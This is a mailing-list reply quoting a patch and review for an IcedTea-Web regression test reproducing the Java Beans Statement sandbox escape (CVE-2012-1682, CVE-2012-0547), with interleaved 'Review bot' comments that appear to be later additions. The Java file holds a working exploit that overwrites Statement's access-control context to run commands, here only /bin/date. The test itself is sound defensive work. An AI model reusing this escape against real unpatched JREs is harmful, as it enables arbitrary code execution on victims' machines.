[rfc][icedtea-web] Reproducer of BeansStatement behaviour

Jiri Vanek jvanek at redhat.com
Mon Dec 17 08:21:30 PST 2012


On 12/14/2012 09:58 PM, Adam Domurad wrote:
> On 12/13/2012 11:35 AM, Jiri Vanek wrote:
>> Ok for head?
>>
>> J.
>
> I'm assuming this is OK for the repo since this has been made public before. To be exact though this
> is testing a property of the JRE.
>
>> diff -r 855087771e7e
>> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploit.html
>> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploit.html  Mon Sep
>> 03 16:04:41 2012 +0200
>> @@ -0,0 +1,42 @@
>> +<!--
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or modify
>> +it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation; either version 2, or (at your option)
>> +any later version.
>> +
>> +IcedTea is distributed in the hope that it will be useful, but
>> +WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING.  If not, write to the
>> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library.  Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module.  An independent module is a module which is not derived from
>> +or based on this library.  If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so.  If you do not wish to do so, delete this
>> +exception statement from your version.
>> +
>> + -->
>> +<html><head></head><body bgcolor="blue">
>> +<p><applet code="GondvvMinimal2.class" archive="BeansStatementExploit.jar" codebase="."
>> width="100" height="20">
>> +</applet></p>
>> +</body>
>> +</html>
>> diff -r 855087771e7e
>> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitApplet.jnlp
>
> Maybe 'BeansStatementBreakSandbox' would be a bit clearer.
>
>> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitApplet.jnlp
>>  Mon Sep 03 16:04:41 2012 +0200
>> @@ -0,0 +1,61 @@
>> +<!--
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or modify
>> +it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation; either version 2, or (at your option)
>> +any later version.
>> +
>> +IcedTea is distributed in the hope that it will be useful, but
>> +WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING.  If not, write to the
>> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library.  Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module.  An independent module is a module which is not derived from
>> +or based on this library.  If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so.  If you do not wish to do so, delete this
>> +exception statement from your version.
>> +
>> + -->
>> +<?xml version="1.0" encoding="utf-8"?>
>> +<jnlp spec="1.0" href="BeansStatementExploitApplet.jnlp" codebase=".">
>> +    <information>
>> +        <title>BeansStatementExploitApplet</title>
>> +        <vendor>IcedTea</vendor>
>> +        <homepage href="http://icedtea.classpath.org/wiki/IcedTea-Web#Testing_IcedTea-Web"/>
>> + <description>BeansStatementExploitApplet</description>
>> +        <offline/>
>> +    </information>
>> +    <resources>
>> +        <j2se version="1.6+"/>
>> +        <jar href="BeansStatementExploit.jar"/>
>> +    </resources>
>> +    <applet-desc
>> +      documentBase="."
>> +      name="BeansStatementExploitApplet"
>> +      main-class="GondvvMinimal2"
>> +      width="100"
>> +      height="100">
>> +    </applet-desc>
>> +</jnlp>
>> +
>> +
>> +</applet-desc>
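Review bot: the final added line `</applet-desc>` comes after `</jnlp>` and has no matching open element (the real `<applet-desc>` is already closed inside `<jnlp>`), so the file is not well-formed XML; delete it together with the two blank lines before it. The `<?xml version="1.0" encoding="utf-8"?>` declaration is also placed after the licence comment, but an XML declaration is only valid as the very first thing in the document, so either move the comment below it or drop the declaration. Minor: the `<description>` line is indented one space while its sibling elements use eight.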
>> diff -r 855087771e7e
>> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitWS.jnlp
>> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitWS.jnlp  Mon
>> Sep 03 16:04:41 2012 +0200
>> @@ -0,0 +1,56 @@
>> +<!--
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or modify
>> +it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation; either version 2, or (at your option)
>> +any later version.
>> +
>> +IcedTea is distributed in the hope that it will be useful, but
>> +WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING.  If not, write to the
>> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library.  Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module.  An independent module is a module which is not derived from
>> +or based on this library.  If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so.  If you do not wish to do so, delete this
>> +exception statement from your version.
>> +
>> + -->
>> +<?xml version="1.0" encoding="utf-8"?>
>> +<jnlp spec="1.0" href="BeansStatementExploitWS.jnlp" codebase=".">
>> +    <information>
>> +        <title>BeansStatementExploitWS</title>
>> +        <vendor>IcedTea</vendor>
>> +        <homepage href="http://icedtea.classpath.org/wiki/IcedTea-Web#Testing_IcedTea-Web"/>
>> + <description>BeansStatementExploitWS</description>
>> +        <offline/>
>> +    </information>
>> +    <resources>
>> +        <j2se version="1.6+"/>
>> +        <jar href="BeansStatementExploit.jar"/>
>> +    </resources>
>> +  <application-desc main-class="GondvvTestcase4">
>> +  </application-desc>
>> +</jnlp>
>> +
>> +
>> +</applet-desc>
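Review bot: same problem as the applet JNLP: the trailing `</applet-desc>` after `</jnlp>` makes the file ill-formed XML, and here there is not even an `<applet-desc>` to close (this file uses `<application-desc>`); remove it and the two blank lines above it. The XML declaration again follows the licence comment instead of being the first line of the file, and the `<description>` line is indented inconsistently with its siblings.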
>> diff -r 855087771e7e tests/reproducers/simple/BeansStatementExploit/srcs/GondvvMinimal2.java
>> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/srcs/GondvvMinimal2.java  Mon Sep 03 16:04:41
>> 2012 +0200
>> @@ -0,0 +1,49 @@
>> +/* GondvvMinimal2.java
>> +Copyright (C) 2011 Red Hat, Inc.
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or
>> +modify it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation, version 2.
>> +
>> +IcedTea is distributed in the hope that it will be useful,
>> +but WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING.  If not, write to
>> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library.  Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module.  An independent module is a module which is not derived from
>> +or based on this library.  If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so.  If you do not wish to do so, delete this
>> +exception statement from your version.
>> + */
>> +
>> +import java.applet.Applet;
>> +
>> +
>> +public class GondvvMinimal2 extends Applet {
>
> I understand why you chose this name, but I would prefer something more descriptive of the intent of
> the applet.
>
>> +
>> +    @Override
>> +    public void init() {
>> +    GondvvTestcase4.main(new String[0]);
>> +
>> +    }
>> +
>> +}
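Review bot: the call `GondvvTestcase4.main(new String[0]);` inside `init()` is indented at the same level as the method signature; indent it one level further to match the rest of the file. Minor: the header says `Copyright (C) 2011` while the file is dated September 2012.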
>> diff -r 855087771e7e tests/reproducers/simple/BeansStatementExploit/srcs/GondvvTestcase4.java
>> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/srcs/GondvvTestcase4.java  Mon Sep 03
>> 16:04:41 2012 +0200
>> @@ -0,0 +1,181 @@
>> +/* GondvvTestcase4.java
>> +Copyright (C) 2011 Red Hat, Inc.
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or
>> +modify it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation, version 2.
>> +
>> +IcedTea is distributed in the hope that it will be useful,
>> +but WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING.  If not, write to
>> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library.  Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module.  An independent module is a module which is not derived from
>> +or based on this library.  If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so.  If you do not wish to do so, delete this
>> +exception statement from your version.
>> + */
>> +
>> +import java.beans.Statement;
>> +import java.beans.Expression;
>> +
>> +import java.lang.reflect.Field;
>> +import java.net.URL;
>> +import java.security.*;
>> +import java.security.cert.Certificate;
>> +import java.io.InputStreamReader;
>> +import java.io.BufferedReader;
>> +
>> +/**
>> + *
>> + * Summary for @
>> + * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682
>> + * and
>> + * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547
>> + */
>> +public class GondvvTestcase4 {
>> +
>> +    public static int runproc(Process proc) throws Exception {
>> +        BufferedReader cmdout = new BufferedReader(new InputStreamReader(proc.getInputStream()));
>> +        String line;
>> +        while ((line = cmdout.readLine()) != null) {
>> +            System.out.println(line);
>> +        }
>> +        proc.waitFor();
>> +        return proc.exitValue();
>> +    }
>> +
>> +    public static void runcommand_exploit(String cmd) throws Exception {
>> +        Expression exec_ex = new Expression(Runtime.getRuntime(), "exec", new String[]{cmd});
>> +
>> +        Permissions perms = new Permissions();
>> +        perms.add(new AllPermission());
>> +        ProtectionDomain protdomain = new ProtectionDomain(
>> +                new CodeSource(new URL("file:///"), new Certificate[0]), perms);
>> +        AccessControlContext acc = new AccessControlContext(new ProtectionDomain[]{protdomain});
>> +
>> +        Expression tmp_ex = new Expression(Class.class, "forName", new
>> Object[]{"sun.awt.SunToolkit"});
>> +        tmp_ex.execute();
>> +        Class toolkit = (Class) tmp_ex.getValue();
>> +
>> +        tmp_ex = new Expression(toolkit, "getField", new Object[]{Statement.class, "acc"});
>> +        tmp_ex.execute();
>> +        ((Field) tmp_ex.getValue()).set(exec_ex, acc);
>> +        exec_ex.execute();
>> +
>> +        runproc((Process) exec_ex.getValue());
>> +    }
>> +
>> +    public static void runcommand_direct(String cmd) throws Exception {
>> +        runproc(Runtime.getRuntime().exec(cmd));
>> +    }
>> +
>> +    public static void main(String[] args) {
>> +        System.out.println("Running GondvvTest");
>> +        args = new String[]{"/bin/date"};
>> +        try {
>> +            System.out.println("Directly calling: Class.forName(\"sun.awt.SunToolkit\")");
>> +
>> +            Object cl = Class.forName("sun.awt.SunToolkit");
>> +            System.out.println("FAIL: " + cl.toString());
>> +        } catch (AccessControlException e) {
>> +            System.out.println("OK: got expected: " + e.toString());
>> +        } catch (Exception e) {
>> +            System.out.println("FAIL: unexpected exception: " + e.toString());
>> +            e.printStackTrace();
>> +        }
>
> Can you move the FAIL/OK checks into the testcase class possibly? I guess it's OK as it is, but if
> you can make the testcase do more checking and not just checking for FAIL it would be good.
>
>> +        System.out.println();
>> +
>> +
>> +        try {
>> +            System.out.println("Calling: Expression(Class.class, \"forName\", new
>> String[]{\"sun.awt.SunToolkit\"})");
>> +
>> +            Expression ex = new Expression(Class.class, "forName", new
>> String[]{"sun.awt.SunToolkit"});
>> +            ex.execute();
>> +            Object cl = ex.getValue();
>> +            System.out.println("FAIL: " + cl.toString());
>> +            System.out.println();
>> +            System.out.println("Checking if SunToolkit class reference is usable");
>> +            try {
>> +                ex = new Expression(cl, "getField", new Object[]{Byte.class, "SIZE"});
>> +                ex.execute();
>> +                System.out.println("FAIL: " + ex.getValue().toString());
>> +            } catch (NoSuchMethodException e) {
>> +                System.out.println("INFO: " + e.toString());
>> +                e.printStackTrace();
>> +            } catch (Exception e) {
>> +                System.out.println("FAIL: unexpected exception: " + e.toString());
>> +                e.printStackTrace();
>> +            }
>> +
>> +            try {
>> +                ex = new Expression(cl, "getField", new Object[]{Statement.class, "acc"});
>> +                ex.execute();
>> +                System.out.println("FAIL: " + ex.getValue().toString());
>> +            } catch (NoSuchMethodException e) {
>> +                System.out.println("INFO: " + e.toString());
>> +                e.printStackTrace();
>> +            } catch (Exception e) {
>> +                System.out.println("FAIL: unexpected exception: " + e.toString());
>> +                e.printStackTrace();
>> +            }
>> +        } catch (AccessControlException e) {
>> +            System.out.println("OK: got expected: " + e.toString());
>> +        } catch (Exception e) {
>> +            System.out.println("FAIL: unexpected exception: " + e.toString());
>> +            e.printStackTrace();
>> +        }
>> +        System.out.println();
>> +
>> +        if (args.length == 0) {
>> +        }
>
> ??
>
>> +
>> +        try {
>> +            System.out.println("Running command directly: " + args[0]);
>> +            runcommand_direct(args[0]);
>> +            System.out.println("FAIL: commnad was run");
>> +        } catch (AccessControlException e) {
>> +            System.out.println("OK: got expected: " + e.toString());
>> +        } catch (Exception e) {
>> +            System.out.println("FAIL: unexpected exception: " + e.toString());
>> +            e.printStackTrace();
>> +        }
>> +        System.out.println();
>> +
>> +        try {
>> +            System.out.println("Running command using exploit: " + args[0]);
>> +            runcommand_exploit(args[0]);
>> +            System.out.println("FAIL: commnad was run");
>> +        } catch (AccessControlException e) {
>> +            System.out.println("OK: got expected: " + e.toString());
>> +        } catch (NoSuchMethodException e) {
>> +            System.out.println("FAIL: " + e.toString());
>> +            e.printStackTrace();
>> +        } catch (Exception e) {
>> +            System.out.println("FAIL: unexpected exception: " + e.toString());
>> +            e.printStackTrace();
>> +        }
>> +        System.out.println();
>
> Looks OK but again
>
>> +
>> +
>> +    }
>> +}
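Review bot: the empty `if (args.length == 0) { }` block is dead code: `args` is overwritten with `new String[]{"/bin/date"}` near the top of `main`, so the condition can never be true and any command-line argument is silently ignored; either drop the reassignment and use the block to fall back to `/bin/date` when no argument is given, or delete the block. Two further points: `runproc` only drains the child's stdout, so a child that writes more than a pipe buffer to stderr can block `proc.waitFor()` indefinitely; starting the process through `ProcessBuilder` with `redirectErrorStream(true)` avoids that. And `NoSuchMethodException` is reported as `INFO` in the two `getField` probes but as `FAIL` in the `runcommand_exploit` block; a comment stating which outcome a fixed JRE is expected to produce in each place would make the verdicts easier to trust. Typo: "commnad" (twice).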
>> diff -r 855087771e7e
>> tests/reproducers/simple/BeansStatementExploit/testcases/BeansStatementExploitTests.java
>> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/testcases/BeansStatementExploitTests.java
>>  Mon Sep 03 16:04:41 2012 +0200
>> @@ -0,0 +1,82 @@
>> +/* BeansStatementExploitTests.java
>> +Copyright (C) 2011 Red Hat, Inc.
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or
>> +modify it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation, version 2.
>> +
>> +IcedTea is distributed in the hope that it will be useful,
>> +but WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING.  If not, write to
>> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library.  Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module.  An independent module is a module which is not derived from
>> +or based on this library.  If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so.  If you do not wish to do so, delete this
>> +exception statement from your version.
>> + */
>> +
>> +import net.sourceforge.jnlp.ProcessResult;
>> +import net.sourceforge.jnlp.annotations.Bug;
>> +import net.sourceforge.jnlp.browsertesting.BrowserTest;
>> +import net.sourceforge.jnlp.browsertesting.Browsers;
>> +import net.sourceforge.jnlp.annotations.NeedsDisplay;
>> +import net.sourceforge.jnlp.annotations.TestInBrowsers;
>> +import org.junit.Assert;
>> +
>> +import org.junit.Test;
>> +
>> +public class BeansStatementExploitTests extends BrowserTest {
>> +
>> +    @Test
>> +    @NeedsDisplay
>> + @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682",
>> "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
>> +    public void BeansStatementExploitTestWS() throws Exception {
>> +        ProcessResult pr = server.executeJavawsHeadless(null, "/BeansStatementExploitWS.jnlp");
>> +        evaluate(pr);
>> +    }
>> +
>> +    @Test
>> +    @NeedsDisplay
>> + @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682",
>> "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
>> +    public void BeansStatementExploitTesWsApplet() throws Exception {
>> +        ProcessResult pr = server.executeJavawsHeadless(null, "/BeansStatementExploitApplet.jnlp");
>> +        evaluate(pr);
>> +    }
>> +
>> +    @Test
>> +    @TestInBrowsers(testIn = {Browsers.all})
>> +    @NeedsDisplay
>> + @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682",
>> "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
>> +    public void BeansStatementExploitTestApplet() throws Exception {
>> +        ProcessResult pr = server.executeBrowser("/BeansStatementExploit.html");
>> +        evaluate(pr);
>> +        Assert.assertTrue(pr.wasTerminated);
>> +    }
>> +
>> +    private void evaluate(ProcessResult pr) {
>> +        Assert.assertTrue("Output of reproducerwas empty => it was not run", (pr.stdout.length()
>> > 0));
>> +        Assert.assertTrue("Output of reproducerwas have not contained  'Running GondvvTest' => it
>> was not run", (pr.stdout.contains("Running GondvvTest")));
>> +        Assert.assertFalse("Output of reproducer contained FAIL, that means that exploit have
>> hacked your system", (pr.stdout.contains("FAIL:")));
>> +
>> +    }
>> +}
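Review bot: `evaluate` only asserts that `FAIL:` is absent from stdout, so a run that printed the `Running GondvvTest` banner and then died before reaching any check would still pass; assert positively on the expected `OK: got expected:` lines as well, which also covers the extra checking requested above. Also: `BeansStatementExploitTesWsApplet` is missing a `t` in `Test`; the assertion messages "Output of reproducerwas empty", "Output of reproducerwas have not contained 'Running GondvvTest'" and "exploit have hacked your system" should read "Output of reproducer was empty => it was not run", "Output of reproducer did not contain 'Running GondvvTest' => it was not run" and "Output of reproducer contained FAIL, which means the exploit escaped the sandbox"; and the `@Bug` annotations are indented one space where the other annotations use four.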
>
> Looks OK, although this seems like something that is better placed in a JRE's test suite, not ITW's.
> I have no problems with it going in the repo, though.
>
> Happy hacking,
> -Adam

Thank you for the review. All except FAIL/OK fixed. And for those stdouts I would rather stay with it.
I have also added listeners to speed up closing....

J.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: openjdk-exploit3-reproducer3.diff
Type: text/x-patch
Size: 22176 bytes
Desc: not available
Url : http://mail.openjdk.java.net/pipermail/distro-pkg-dev/attachments/20121217/f4c26741/openjdk-exploit3-reproducer3.diff 
